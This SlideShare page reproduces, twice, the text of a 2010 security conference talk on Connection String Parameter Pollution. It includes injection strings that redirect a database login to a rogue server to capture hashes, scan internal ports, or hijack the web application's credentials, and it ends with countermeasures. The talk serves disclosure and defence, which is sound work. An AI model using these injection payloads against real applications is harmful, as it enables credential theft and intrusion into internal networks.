SlideShare una empresa de Scribd logo

Connection String Parameter Pollution Attacks

Descargar como PPTX, PDF
Chema Alonso
Chema Alonso

Talk delivered by Chema Alonso and Jose Palazon "Palako" in BlackHat DC 2010 about Connection String Injection Parameter Pollution attacks.

1 de 43
p Chema Alonso & Palako Informática 64 Chema Alonso Informática 64
ConnectionStrings Define thewayanapplicationconnectsto data repository There are connectionstringsfor: RelationalDatabases (MSSQL, Oracle, MySQL,…) LDAP Directories Files Etc…
DatabasesConnectionStrings Data Source = myServerAddress; InitialCatalog = myDataBase; User Id = myUsername; Password = myPassword;
DB Connectionbuild up
Google Hacking
Google Hacking
UDL (Universal Data Links) Files
HowWebappconnectsto DB OperatingSystemAccounts DatabaseCredentials Data Source = myServerAddress; InitialCatalog = myDataBase; User Id =; Password =; Integrated Security = SSPI/True/Yes; Data Source = myServerAddress; InitialCatalog = myDataBase; User Id = myUsername; Password = myPassword; Integrated Security = No;
Usersauthenticatedby Web App Web applicationmanagestheloginprocess Syslogins 1.- Web applicatonconnectsusingitscredentialstothedatabase. 2.- Asksuserlogininformation. 3.- Checkslogininformationaboutinfostored in customuserstable. Connectionstring Customuserstable Select id fromusers DatabaseEngine Apprunningon Web Server
UsersautheticatedbyDatabase Databaseenginemanagestheloginprocess 1.- Web applicationasksforcredentials. 2.- A connectionstringiscomposedwiththecredentialstoconnecttothedatabase. 3.- Roles and permits are limitedbytheuserused in theconnectionstring Syslogins Connectionstring DatabaseEngine Apprunningon Web Server
ConnectionStringAttacks It´spossibletoinjectparametersintoconnectionstringsusingsemicolons as a separator Data Source = myServerAddress; InitialCatalog = myDataBase; Integrated Security = NO; User Id = myUsername; Password = myPassword; Encryption = Off;
ConnectionStringBuilder Available in .NET Framework 2.0 Buildsecureconnectionstringsusingparameters It´snotpossibletoinjectintotheconnectionstring
Are peopleaware of this?
ConnectionStringParameterPollution The goal is to inject parameters in the connection string, whether they exist or not Had duplicated a parameter, the last value wins This behavior allows attackers to overwrite completely the connection string, therefore to manipulate the way the application will work and how should be the it authenticated
PollutionableBehavior Param1=Value A Param2=Value B Param1=Value C Param2=Value D DBConnectionObject Param1 Param2
What can be done with CSPP?Overwrite a parameter Data Source=DB1 UID=sa Data Source=DB2 password=Pwnd! DBConnectionObject DataSource UID password
Scanningthe DMZ DevelopmentDatabase 1 FinnacialDatabase Test Database ForgottenDatabase Internet FW Web app vulnerable to CSPP ProductionDatabase Data Source
Port Scanning a Server ProductionDatabase Server FW DataSource DB1,80 Internet Web app vulnerable to CSPP DB1,21 DB1,25 DB1,1445
What can be done with CSPP?Add a parameter Data Source=DB1 UID=sa Integrated Security=True password=Pwnd! DBConnectionObject DataSource UID password
CSPP Attack 1: Hash stealing 1.- Run a Rogue Server onanaccessible IP address: Rogue_Server 2.- Activate a snifferto catch theloginprocess Cain/Wireshark 3.- Overwrite Data Sourceparameter Data_Source=Rogue_Server 4.- Force Windows IntegratedAuthentication Integrated Security=true
CSPP Attack 1: Hash stealing Data source = SQL2005; initial catalog = db1; Integrated Security=no; user id=+’User_Value’+; Password=+’Password_Value’+; Data source = SQL2005; initial catalog = db1; Integrated Security=no; user id=;Data Source=Rogue_Server; Password=;Integrated Security=True;
CSSP 1:ASP.NET Enterprise Manager
CSPP Attack 2: Port Scanning 1.- Duplicatethe Data Sourceparametersettingthe Target server and target porttobescanned. Data_Source=Target_Server,target_Port 2.- Checkthe error messages: - No TCP Connection -> Port isclosed - No SQL Server -> Port is open - InvalidPassword -> SQL Server there!
CSPP Attack 2: Port Scanning Data source = SQL2005; initial catalog = db1; Integrated Security=no; user id=+’User_Value’+; Password=+’Password_Value’+; Data source = SQL2005; initial catalog = db1; Integrated Security=no; user id= ;Data Source=Target_Server, Target_Port; Password=;Integrated Security=True;
CSPP 2: myLittleAdmin Port is Open
CSPP 2: myLittleAdmin Port isClosed
CSPP Attack 3: Hijacking Web Credentials 1.- Duplicate Data Sourceparametertothe target SQL Server Data_Source=Target_Server 2.- Force Windows Authentication Integrated Security=true 3.- Application pool in whichthe web appisrunningonwillsenditscredentials in orderto log in tothedatabaseengine.
CSPP Attack 3: Hijacking Web Credentials Data source = SQL2005; initial catalog = db1; Integrated Security=no; user id=+’User_Value’+; Password=+’Password_Value’+; Data source = SQL2005; initial catalog = db1; Integrated Security=no; user id=;Data Source=Target_Server; Password=;Integrated Security=true;
CSPP Attack 3: Web Data Administrator
CSPP Attack 3: myLittleAdmin/myLittleBackup
CSPP Attack 3: ASP.NET Enterprise Manager
OtherDatabases MySQL Does not support Integrated security It´s possible to manipulate the behavior of the web application, although Port Scanning Connect to internal/testing/for developing Databases Steal credentials Oracle supports integrated authority running on Windows and UNIX/Linux servers It´s possible to perform all described attacks Hash stealing Port Scanning Hijacking Web credentials Also it´s possible to elevate a connection to sysdba in order to shutdown/startup an instance
Demo Demo
Scanner Proof of concept to test yournetwork Try a hijacking web credentialsattack Written in ASP.NET C# Free download (codeinclude of course) http://www.informatica64.com/csppScanner.aspx
CSPP Scanner
Scanner CSPP: Attacks
Demo Demo
myLittleAdmin/myLittleBackup myLittleToolsreleased a securyadvisory and a patchaboutthis
ASP.NET Enterprise Manager ASP.NET Enterprise Manager is “abandoned”, but it´s still been used in a lot of web Control Panels. Fix the code yourself
ASP.NET Enterprise Manager ASP.NET Enterprise Manager is “abandoned”, but it´s still been used in a lot of web Control Panels. Fix the code yourself
ASP.NET Web Data Admistrator ASP Web Data Administratorissecure in CodePlex web site, butnot in Microsoft web sitewhereanunsecureoldversioniswaspublished
Countermeasures Hardenyour firewall Outboundconnections Reviewyourinternalaccountspolicy Web application Web server DatabaseEngine Use ConnectionStringBuilder Filterthe;)
Questions? Contacto Chema Alonso chema@informatica64.com http://www.informatica64.com http://elladodelmal.blogspot.com http://twitter.com/chemaalonso José Palazón “Palako” palako@lateatral.com Authors Chema Alonso Manuel Fernández “The Sur” Alejandro Martín Bailón Antonio Guzmán

Recomendados

Testcontainers - Geekout EE 2017 presentation
Testcontainers - Geekout EE 2017 presentationTestcontainers - Geekout EE 2017 presentation
Testcontainers - Geekout EE 2017 presentation
Richard North
 
Finally, easy integration testing with Testcontainers
Finally, easy integration testing with TestcontainersFinally, easy integration testing with Testcontainers
Finally, easy integration testing with Testcontainers
Rudy De Busscher
 
Exception handling
Exception handlingException handling
Exception handling
PhD Research Scholar
 
Why Rust? - Matthias Endler - Codemotion Amsterdam 2016
Why Rust? - Matthias Endler - Codemotion Amsterdam 2016Why Rust? - Matthias Endler - Codemotion Amsterdam 2016
Why Rust? - Matthias Endler - Codemotion Amsterdam 2016
Codemotion
 
addition of two matrices
addition of two matricesaddition of two matrices
addition of two matrices
A A
 
Real Life Clean Architecture
Real Life Clean ArchitectureReal Life Clean Architecture
Real Life Clean Architecture
Mattia Battiston
 
Applets in java
Applets in javaApplets in java
Applets in java
Wani Zahoor
 
Object Oriented Programming
Object Oriented ProgrammingObject Oriented Programming
Object Oriented Programming
Iqra khalil
 

Recomendados

Testcontainers - Geekout EE 2017 presentation
Testcontainers - Geekout EE 2017 presentationTestcontainers - Geekout EE 2017 presentation
Testcontainers - Geekout EE 2017 presentation
Richard North
 
Finally, easy integration testing with Testcontainers
Finally, easy integration testing with TestcontainersFinally, easy integration testing with Testcontainers
Finally, easy integration testing with Testcontainers
Rudy De Busscher
 
Exception handling
Exception handlingException handling
Exception handling
PhD Research Scholar
 
Why Rust? - Matthias Endler - Codemotion Amsterdam 2016
Why Rust? - Matthias Endler - Codemotion Amsterdam 2016Why Rust? - Matthias Endler - Codemotion Amsterdam 2016
Why Rust? - Matthias Endler - Codemotion Amsterdam 2016
Codemotion
 
addition of two matrices
addition of two matricesaddition of two matrices
addition of two matrices
A A
 
Real Life Clean Architecture
Real Life Clean ArchitectureReal Life Clean Architecture
Real Life Clean Architecture
Mattia Battiston
 
Applets in java
Applets in javaApplets in java
Applets in java
Wani Zahoor
 
Object Oriented Programming
Object Oriented ProgrammingObject Oriented Programming
Object Oriented Programming
Iqra khalil
 
SPARQL Tutorial
SPARQL TutorialSPARQL Tutorial
SPARQL Tutorial
Leigh Dodds
 
Jena – A Semantic Web Framework for Java
Jena – A Semantic Web Framework for JavaJena – A Semantic Web Framework for Java
Jena – A Semantic Web Framework for Java
Aleksander Pohl
 
What is java?
What is java? What is java?
What is java?
pratibha gupta
 
Types of exceptions
Types of exceptionsTypes of exceptions
Types of exceptions
myrajendra
 
Virtual function in C++ Pure Virtual Function
Virtual function in C++ Pure Virtual Function Virtual function in C++ Pure Virtual Function
Virtual function in C++ Pure Virtual Function
Kamlesh Makvana
 
MongoDB + Java + Spring Data
MongoDB + Java + Spring DataMongoDB + Java + Spring Data
MongoDB + Java + Spring Data
Anton Sulzhenko
 
Pure virtual function and abstract class
Pure virtual function and abstract classPure virtual function and abstract class
Pure virtual function and abstract class
Amit Trivedi
 
Java DataBase Connectivity API (JDBC API)
Java DataBase Connectivity API (JDBC API)Java DataBase Connectivity API (JDBC API)
Java DataBase Connectivity API (JDBC API)
Luzan Baral
 
Making Java more dynamic: runtime code generation for the JVM
Making Java more dynamic: runtime code generation for the JVMMaking Java more dynamic: runtime code generation for the JVM
Making Java more dynamic: runtime code generation for the JVM
Rafael Winterhalter
 
Object Oriented Programming using C++(UNIT 1)
Object Oriented Programming using C++(UNIT 1)Object Oriented Programming using C++(UNIT 1)
Object Oriented Programming using C++(UNIT 1)
SURBHI SAROHA
 
Programming the Semantic Web
Programming the Semantic WebProgramming the Semantic Web
Programming the Semantic Web
Luigi De Russis
 
Polymorphism
PolymorphismPolymorphism
Polymorphism
Nochiketa Chakraborty
 
Semantic Web - Ontologies
Semantic Web - OntologiesSemantic Web - Ontologies
Semantic Web - Ontologies
Serge Linckels
 
States, state graphs and transition testing
States, state graphs and transition testingStates, state graphs and transition testing
States, state graphs and transition testing
geethawilliam
 
Type Systems
Type SystemsType Systems
Type Systems
Jordan Parmer
 
Elasticsearch 簡介
Elasticsearch 簡介Elasticsearch 簡介
Elasticsearch 簡介
Jui An Huang (黃瑞安)
 
A Deep Dive into JSON-LD and Hydra
A Deep Dive into JSON-LD and HydraA Deep Dive into JSON-LD and Hydra
A Deep Dive into JSON-LD and Hydra
Markus Lanthaler
 
Lambda Expressions in C++
Lambda Expressions in C++Lambda Expressions in C++
Lambda Expressions in C++
Patrick Viafore
 
Operator Overloading
Operator OverloadingOperator Overloading
Operator Overloading
Nilesh Dalvi
 
First order predicate logic(fopl)
First order predicate logic(fopl)First order predicate logic(fopl)
First order predicate logic(fopl)
surbhi jha
 
Examen final de pascal jorge
Examen final de pascal jorgeExamen final de pascal jorge
Examen final de pascal jorge
Mauro Calderon Chavez
 
Default Passwords: Adelante por favor
Default Passwords: Adelante por favorDefault Passwords: Adelante por favor
Default Passwords: Adelante por favor
Chema Alonso
 

Más contenido relacionado

La actualidad más candente

Jena – A Semantic Web Framework for Java
Jena – A Semantic Web Framework for JavaJena – A Semantic Web Framework for Java
Jena – A Semantic Web Framework for Java
Aleksander Pohl
 
Types of exceptions
Types of exceptionsTypes of exceptions
Types of exceptions
myrajendra
 
MongoDB + Java + Spring Data
MongoDB + Java + Spring DataMongoDB + Java + Spring Data
MongoDB + Java + Spring Data
Anton Sulzhenko
 
Making Java more dynamic: runtime code generation for the JVM
Making Java more dynamic: runtime code generation for the JVMMaking Java more dynamic: runtime code generation for the JVM
Making Java more dynamic: runtime code generation for the JVM
Rafael Winterhalter
 
Object Oriented Programming using C++(UNIT 1)
Object Oriented Programming using C++(UNIT 1)Object Oriented Programming using C++(UNIT 1)
Object Oriented Programming using C++(UNIT 1)
SURBHI SAROHA
 
Type Systems
Type SystemsType Systems
Type Systems
Jordan Parmer
 

La actualidad más candente (20)

SPARQL Tutorial
SPARQL TutorialSPARQL Tutorial
SPARQL Tutorial
 
Jena – A Semantic Web Framework for Java
Jena – A Semantic Web Framework for JavaJena – A Semantic Web Framework for Java
Jena – A Semantic Web Framework for Java
 
What is java?
What is java? What is java?
What is java?
 
Types of exceptions
Types of exceptionsTypes of exceptions
Types of exceptions
 
Virtual function in C++ Pure Virtual Function
Virtual function in C++ Pure Virtual Function Virtual function in C++ Pure Virtual Function
Virtual function in C++ Pure Virtual Function
 
MongoDB + Java + Spring Data
MongoDB + Java + Spring DataMongoDB + Java + Spring Data
MongoDB + Java + Spring Data
 
Pure virtual function and abstract class
Pure virtual function and abstract classPure virtual function and abstract class
Pure virtual function and abstract class
 
Java DataBase Connectivity API (JDBC API)
Java DataBase Connectivity API (JDBC API)Java DataBase Connectivity API (JDBC API)
Java DataBase Connectivity API (JDBC API)
 
Making Java more dynamic: runtime code generation for the JVM
Making Java more dynamic: runtime code generation for the JVMMaking Java more dynamic: runtime code generation for the JVM
Making Java more dynamic: runtime code generation for the JVM
 
Object Oriented Programming using C++(UNIT 1)
Object Oriented Programming using C++(UNIT 1)Object Oriented Programming using C++(UNIT 1)
Object Oriented Programming using C++(UNIT 1)
 
Programming the Semantic Web
Programming the Semantic WebProgramming the Semantic Web
Programming the Semantic Web
 
Polymorphism
PolymorphismPolymorphism
Polymorphism
 
Semantic Web - Ontologies
Semantic Web - OntologiesSemantic Web - Ontologies
Semantic Web - Ontologies
 
States, state graphs and transition testing
States, state graphs and transition testingStates, state graphs and transition testing
States, state graphs and transition testing
 
Type Systems
Type SystemsType Systems
Type Systems
 
Elasticsearch 簡介
Elasticsearch 簡介Elasticsearch 簡介
Elasticsearch 簡介
 
A Deep Dive into JSON-LD and Hydra
A Deep Dive into JSON-LD and HydraA Deep Dive into JSON-LD and Hydra
A Deep Dive into JSON-LD and Hydra
 
Lambda Expressions in C++
Lambda Expressions in C++Lambda Expressions in C++
Lambda Expressions in C++
 
Operator Overloading
Operator OverloadingOperator Overloading
Operator Overloading
 
First order predicate logic(fopl)
First order predicate logic(fopl)First order predicate logic(fopl)
First order predicate logic(fopl)
 

Destacado

Fortificación de MS SharePon
Fortificación de MS SharePonFortificación de MS SharePon
Fortificación de MS SharePon
Chema Alonso
 

Destacado (20)

Examen final de pascal jorge
Examen final de pascal jorgeExamen final de pascal jorge
Examen final de pascal jorge
 
Default Passwords: Adelante por favor
Default Passwords: Adelante por favorDefault Passwords: Adelante por favor
Default Passwords: Adelante por favor
 
Seguridad en Navegadores
Seguridad en NavegadoresSeguridad en Navegadores
Seguridad en Navegadores
 
Seguridad en Apache Web Server
Seguridad en Apache Web ServerSeguridad en Apache Web Server
Seguridad en Apache Web Server
 
Navegadores en la Empresa
Navegadores en la EmpresaNavegadores en la Empresa
Navegadores en la Empresa
 
MS Forefront Client Security
MS Forefront Client SecurityMS Forefront Client Security
MS Forefront Client Security
 
Portátiles A Prueba De Robos
Portátiles A Prueba De RobosPortátiles A Prueba De Robos
Portátiles A Prueba De Robos
 
Circuitos de Video Vigilancia IP
Circuitos de Video Vigilancia IPCircuitos de Video Vigilancia IP
Circuitos de Video Vigilancia IP
 
Asegúr@IT 7: Serialized SQL Injection
Asegúr@IT 7: Serialized SQL InjectionAsegúr@IT 7: Serialized SQL Injection
Asegúr@IT 7: Serialized SQL Injection
 
Fortificación de MS SharePon
Fortificación de MS SharePonFortificación de MS SharePon
Fortificación de MS SharePon
 
Apadrina un malware
Apadrina un malwareApadrina un malware
Apadrina un malware
 
RootedCON 2011: DUST
RootedCON 2011: DUSTRootedCON 2011: DUST
RootedCON 2011: DUST
 
Hacking, Ciberguerra y otros Palabros
Hacking, Ciberguerra y otros PalabrosHacking, Ciberguerra y otros Palabros
Hacking, Ciberguerra y otros Palabros
 
Asegúr@IT 7 - Forefront UAG 2010
Asegúr@IT 7 - Forefront UAG 2010Asegúr@IT 7 - Forefront UAG 2010
Asegúr@IT 7 - Forefront UAG 2010
 
MetaShield Protector & FOCA 2.0
MetaShield Protector & FOCA 2.0MetaShield Protector & FOCA 2.0
MetaShield Protector & FOCA 2.0
 
Codemotion 2013: Feliz 15 aniversario, SQL Injection
Codemotion 2013: Feliz 15 aniversario, SQL InjectionCodemotion 2013: Feliz 15 aniversario, SQL Injection
Codemotion 2013: Feliz 15 aniversario, SQL Injection
 
Defcon 18: FOCA 2
Defcon 18: FOCA 2Defcon 18: FOCA 2
Defcon 18: FOCA 2
 
Hachetetepé dos puntos SLAAC SLAAC
Hachetetepé dos puntos SLAAC SLAACHachetetepé dos puntos SLAAC SLAAC
Hachetetepé dos puntos SLAAC SLAAC
 
FC00::1 (Algunos) Ataques en IPv6
FC00::1 (Algunos) Ataques en IPv6FC00::1 (Algunos) Ataques en IPv6
FC00::1 (Algunos) Ataques en IPv6
 
WebBrowsing Fingerprinting y Privacidad en entornos de Big Data
WebBrowsing Fingerprinting y Privacidad en entornos de Big DataWebBrowsing Fingerprinting y Privacidad en entornos de Big Data
WebBrowsing Fingerprinting y Privacidad en entornos de Big Data
 

Similar a Connection String Parameter Pollution Attacks

It's a Dangerous World
It's a Dangerous World It's a Dangerous World
It's a Dangerous World
MongoDB
 
CONHESI 2021 - Exploiting Web APIs
CONHESI 2021 - Exploiting Web APIsCONHESI 2021 - Exploiting Web APIs
CONHESI 2021 - Exploiting Web APIs
ThreatReel Podcast
 
SecureWV: Exploiting Web APIs
SecureWV: Exploiting Web APIsSecureWV: Exploiting Web APIs
SecureWV: Exploiting Web APIs
ThreatReel Podcast
 

Similar a Connection String Parameter Pollution Attacks (20)

SQLSecurity.ppt
SQLSecurity.pptSQLSecurity.ppt
SQLSecurity.ppt
 
SQLSecurity.ppt
SQLSecurity.pptSQLSecurity.ppt
SQLSecurity.ppt
 
It's a Dangerous World
It's a Dangerous World It's a Dangerous World
It's a Dangerous World
 
Top web apps security vulnerabilities
Top web apps security vulnerabilitiesTop web apps security vulnerabilities
Top web apps security vulnerabilities
 
ASP.NET security vulnerabilities
ASP.NET security vulnerabilitiesASP.NET security vulnerabilities
ASP.NET security vulnerabilities
 
Application Security around OWASP Top 10
Application Security around OWASP Top 10Application Security around OWASP Top 10
Application Security around OWASP Top 10
 
OWASP_Top_Ten_Proactive_Controls_v2.pptx
OWASP_Top_Ten_Proactive_Controls_v2.pptxOWASP_Top_Ten_Proactive_Controls_v2.pptx
OWASP_Top_Ten_Proactive_Controls_v2.pptx
 
CONHESI 2021 - Exploiting Web APIs
CONHESI 2021 - Exploiting Web APIsCONHESI 2021 - Exploiting Web APIs
CONHESI 2021 - Exploiting Web APIs
 
MySQL server security
MySQL server securityMySQL server security
MySQL server security
 
Low Hanging Fruit, Making Your Basic MongoDB Installation More Secure
Low Hanging Fruit, Making Your Basic MongoDB Installation More SecureLow Hanging Fruit, Making Your Basic MongoDB Installation More Secure
Low Hanging Fruit, Making Your Basic MongoDB Installation More Secure
 
Application of Machine Learning in Cybersecurity
Application of Machine Learning in CybersecurityApplication of Machine Learning in Cybersecurity
Application of Machine Learning in Cybersecurity
 
MongoDB World 2018: Low Hanging Fruit: Making Your Basic MongoDB Installation...
MongoDB World 2018: Low Hanging Fruit: Making Your Basic MongoDB Installation...MongoDB World 2018: Low Hanging Fruit: Making Your Basic MongoDB Installation...
MongoDB World 2018: Low Hanging Fruit: Making Your Basic MongoDB Installation...
 
Top Ten Java Defense for Web Applications v2
Top Ten Java Defense for Web Applications v2Top Ten Java Defense for Web Applications v2
Top Ten Java Defense for Web Applications v2
 
Dynamic Database Credentials: Security Contingency Planning
Dynamic Database Credentials: Security Contingency PlanningDynamic Database Credentials: Security Contingency Planning
Dynamic Database Credentials: Security Contingency Planning
 
Whatever it takes - Fixing SQLIA and XSS in the process
Whatever it takes - Fixing SQLIA and XSS in the processWhatever it takes - Fixing SQLIA and XSS in the process
Whatever it takes - Fixing SQLIA and XSS in the process
 
Intro to Php Security
Intro to Php SecurityIntro to Php Security
Intro to Php Security
 
Web application security
Web application securityWeb application security
Web application security
 
Defending Against Attacks With Rails
Defending Against Attacks With RailsDefending Against Attacks With Rails
Defending Against Attacks With Rails
 
Let's shield Liferay
Let's shield LiferayLet's shield Liferay
Let's shield Liferay
 
SecureWV: Exploiting Web APIs
SecureWV: Exploiting Web APIsSecureWV: Exploiting Web APIs
SecureWV: Exploiting Web APIs
 

Más de Chema Alonso

CritoReto 4: Buscando una aguja en un pajar
CritoReto 4: Buscando una aguja en un pajarCritoReto 4: Buscando una aguja en un pajar
CritoReto 4: Buscando una aguja en un pajar
Chema Alonso
 

Más de Chema Alonso (20)

CyberCamp 2015: Low Hanging Fruit
CyberCamp 2015: Low Hanging FruitCyberCamp 2015: Low Hanging Fruit
CyberCamp 2015: Low Hanging Fruit
 
Índice Pentesting con Kali 2.0
Índice Pentesting con Kali 2.0Índice Pentesting con Kali 2.0
Índice Pentesting con Kali 2.0
 
Configurar y utilizar Latch en Magento
Configurar y utilizar Latch en MagentoConfigurar y utilizar Latch en Magento
Configurar y utilizar Latch en Magento
 
Cazando Cibercriminales con: OSINT + Cloud Computing + Big Data
Cazando Cibercriminales con: OSINT + Cloud Computing + Big DataCazando Cibercriminales con: OSINT + Cloud Computing + Big Data
Cazando Cibercriminales con: OSINT + Cloud Computing + Big Data
 
New Paradigms of Digital Identity: Authentication & Authorization as a Servic...
New Paradigms of Digital Identity: Authentication & Authorization as a Servic...New Paradigms of Digital Identity: Authentication & Authorization as a Servic...
New Paradigms of Digital Identity: Authentication & Authorization as a Servic...
 
CritoReto 4: Buscando una aguja en un pajar
CritoReto 4: Buscando una aguja en un pajarCritoReto 4: Buscando una aguja en un pajar
CritoReto 4: Buscando una aguja en un pajar
 
Dorking & Pentesting with Tacyt
Dorking & Pentesting with TacytDorking & Pentesting with Tacyt
Dorking & Pentesting with Tacyt
 
Pentesting con PowerShell: Libro de 0xWord
Pentesting con PowerShell: Libro de 0xWordPentesting con PowerShell: Libro de 0xWord
Pentesting con PowerShell: Libro de 0xWord
 
Foca API v0.1
Foca API v0.1Foca API v0.1
Foca API v0.1
 
Recuperar dispositivos de sonido en Windows Vista y Windows 7
Recuperar dispositivos de sonido en Windows Vista y Windows 7Recuperar dispositivos de sonido en Windows Vista y Windows 7
Recuperar dispositivos de sonido en Windows Vista y Windows 7
 
It's a Kind of Magic
It's a Kind of MagicIt's a Kind of Magic
It's a Kind of Magic
 
Ingenieros y hackers
Ingenieros y hackersIngenieros y hackers
Ingenieros y hackers
 
Cuarta Edición del Curso Online de Especialización en Seguridad Informática p...
Cuarta Edición del Curso Online de Especialización en Seguridad Informática p...Cuarta Edición del Curso Online de Especialización en Seguridad Informática p...
Cuarta Edición del Curso Online de Especialización en Seguridad Informática p...
 
Auditoría de TrueCrypt: Informe final fase II
Auditoría de TrueCrypt: Informe final fase IIAuditoría de TrueCrypt: Informe final fase II
Auditoría de TrueCrypt: Informe final fase II
 
El juego es el mismo
El juego es el mismoEl juego es el mismo
El juego es el mismo
 
El Hardware en Apple ¿Es tan bueno?
El Hardware en Apple ¿Es tan bueno?El Hardware en Apple ¿Es tan bueno?
El Hardware en Apple ¿Es tan bueno?
 
Latch en Linux (Ubuntu): El cerrojo digital
Latch en Linux (Ubuntu): El cerrojo digitalLatch en Linux (Ubuntu): El cerrojo digital
Latch en Linux (Ubuntu): El cerrojo digital
 
Hacking con Python
Hacking con PythonHacking con Python
Hacking con Python
 
Shuabang Botnet
Shuabang BotnetShuabang Botnet
Shuabang Botnet
 
Tu iPhone es tan (in)seguro como tu Windows
Tu iPhone es tan (in)seguro como tu WindowsTu iPhone es tan (in)seguro como tu Windows
Tu iPhone es tan (in)seguro como tu Windows
 

Connection String Parameter Pollution Attacks

  • 1. p Chema Alonso & Palako Informática 64 Chema Alonso Informática 64
  • 2. ConnectionStrings Define thewayanapplicationconnectsto data repository There are connectionstringsfor: RelationalDatabases (MSSQL, Oracle, MySQL,…) LDAP Directories Files Etc…
  • 3. DatabasesConnectionStrings Data Source = myServerAddress; InitialCatalog = myDataBase; User Id = myUsername; Password = myPassword;
  • 7. UDL (Universal Data Links) Files
  • 8. HowWebappconnectsto DB OperatingSystemAccounts DatabaseCredentials Data Source = myServerAddress; InitialCatalog = myDataBase; User Id =; Password =; Integrated Security = SSPI/True/Yes; Data Source = myServerAddress; InitialCatalog = myDataBase; User Id = myUsername; Password = myPassword; Integrated Security = No;
  • 9. Usersauthenticatedby Web App Web applicationmanagestheloginprocess Syslogins 1.- Web applicatonconnectsusingitscredentialstothedatabase. 2.- Asksuserlogininformation. 3.- Checkslogininformationaboutinfostored in customuserstable. Connectionstring Customuserstable Select id fromusers DatabaseEngine Apprunningon Web Server
  • 10. UsersautheticatedbyDatabase Databaseenginemanagestheloginprocess 1.- Web applicationasksforcredentials. 2.- A connectionstringiscomposedwiththecredentialstoconnecttothedatabase. 3.- Roles and permits are limitedbytheuserused in theconnectionstring Syslogins Connectionstring DatabaseEngine Apprunningon Web Server
  • 11. ConnectionStringAttacks It´spossibletoinjectparametersintoconnectionstringsusingsemicolons as a separator Data Source = myServerAddress; InitialCatalog = myDataBase; Integrated Security = NO; User Id = myUsername; Password = myPassword; Encryption = Off;
  • 12. ConnectionStringBuilder Available in .NET Framework 2.0 Buildsecureconnectionstringsusingparameters It´snotpossibletoinjectintotheconnectionstring
  • 14. ConnectionStringParameterPollution The goal is to inject parameters in the connection string, whether they exist or not Had duplicated a parameter, the last value wins This behavior allows attackers to overwrite completely the connection string, therefore to manipulate the way the application will work and how should be the it authenticated
  • 15. PollutionableBehavior Param1=Value A Param2=Value B Param1=Value C Param2=Value D DBConnectionObject Param1 Param2
  • 16. What can be done with CSPP?Overwrite a parameter Data Source=DB1 UID=sa Data Source=DB2 password=Pwnd! DBConnectionObject DataSource UID password
  • 17. Scanningthe DMZ DevelopmentDatabase 1 FinnacialDatabase Test Database ForgottenDatabase Internet FW Web app vulnerable to CSPP ProductionDatabase Data Source
  • 18. Port Scanning a Server ProductionDatabase Server FW DataSource DB1,80 Internet Web app vulnerable to CSPP DB1,21 DB1,25 DB1,1445
  • 19. What can be done with CSPP?Add a parameter Data Source=DB1 UID=sa Integrated Security=True password=Pwnd! DBConnectionObject DataSource UID password
  • 20. CSPP Attack 1: Hash stealing 1.- Run a Rogue Server onanaccessible IP address: Rogue_Server 2.- Activate a snifferto catch theloginprocess Cain/Wireshark 3.- Overwrite Data Sourceparameter Data_Source=Rogue_Server 4.- Force Windows IntegratedAuthentication Integrated Security=true
  • 21. CSPP Attack 1: Hash stealing Data source = SQL2005; initial catalog = db1; Integrated Security=no; user id=+’User_Value’+; Password=+’Password_Value’+; Data source = SQL2005; initial catalog = db1; Integrated Security=no; user id=;Data Source=Rogue_Server; Password=;Integrated Security=True;
  • 23. CSPP Attack 2: Port Scanning 1.- Duplicatethe Data Sourceparametersettingthe Target server and target porttobescanned. Data_Source=Target_Server,target_Port 2.- Checkthe error messages: - No TCP Connection -> Port isclosed - No SQL Server -> Port is open - InvalidPassword -> SQL Server there!
  • 24. CSPP Attack 2: Port Scanning Data source = SQL2005; initial catalog = db1; Integrated Security=no; user id=+’User_Value’+; Password=+’Password_Value’+; Data source = SQL2005; initial catalog = db1; Integrated Security=no; user id= ;Data Source=Target_Server, Target_Port; Password=;Integrated Security=True;
  • 25. CSPP 2: myLittleAdmin Port is Open
  • 26. CSPP 2: myLittleAdmin Port isClosed
  • 27. CSPP Attack 3: Hijacking Web Credentials 1.- Duplicate Data Sourceparametertothe target SQL Server Data_Source=Target_Server 2.- Force Windows Authentication Integrated Security=true 3.- Application pool in whichthe web appisrunningonwillsenditscredentials in orderto log in tothedatabaseengine.
  • 28. CSPP Attack 3: Hijacking Web Credentials Data source = SQL2005; initial catalog = db1; Integrated Security=no; user id=+’User_Value’+; Password=+’Password_Value’+; Data source = SQL2005; initial catalog = db1; Integrated Security=no; user id=;Data Source=Target_Server; Password=;Integrated Security=true;
  • 29. CSPP Attack 3: Web Data Administrator
  • 30. CSPP Attack 3: myLittleAdmin/myLittleBackup
  • 31. CSPP Attack 3: ASP.NET Enterprise Manager
  • 32. OtherDatabases MySQL Does not support Integrated security It´s possible to manipulate the behavior of the web application, although Port Scanning Connect to internal/testing/for developing Databases Steal credentials Oracle supports integrated authority running on Windows and UNIX/Linux servers It´s possible to perform all described attacks Hash stealing Port Scanning Hijacking Web credentials Also it´s possible to elevate a connection to sysdba in order to shutdown/startup an instance
  • 34. Scanner Proof of concept to test yournetwork Try a hijacking web credentialsattack Written in ASP.NET C# Free download (codeinclude of course) http://www.informatica64.com/csppScanner.aspx
  • 38. myLittleAdmin/myLittleBackup myLittleToolsreleased a securyadvisory and a patchaboutthis
  • 39. ASP.NET Enterprise Manager ASP.NET Enterprise Manager is “abandoned”, but it´s still been used in a lot of web Control Panels. Fix the code yourself
  • 40. ASP.NET Enterprise Manager ASP.NET Enterprise Manager is “abandoned”, but it´s still been used in a lot of web Control Panels. Fix the code yourself
  • 41. ASP.NET Web Data Admistrator ASP Web Data Administratorissecure in CodePlex web site, butnot in Microsoft web sitewhereanunsecureoldversioniswaspublished
  • 42. Countermeasures Hardenyour firewall Outboundconnections Reviewyourinternalaccountspolicy Web application Web server DatabaseEngine Use ConnectionStringBuilder Filterthe;)
  • 43. Questions? Contacto Chema Alonso chema@informatica64.com http://www.informatica64.com http://elladodelmal.blogspot.com http://twitter.com/chemaalonso José Palazón “Palako” palako@lateatral.com Authors Chema Alonso Manuel Fernández “The Sur” Alejandro Martín Bailón Antonio Guzmán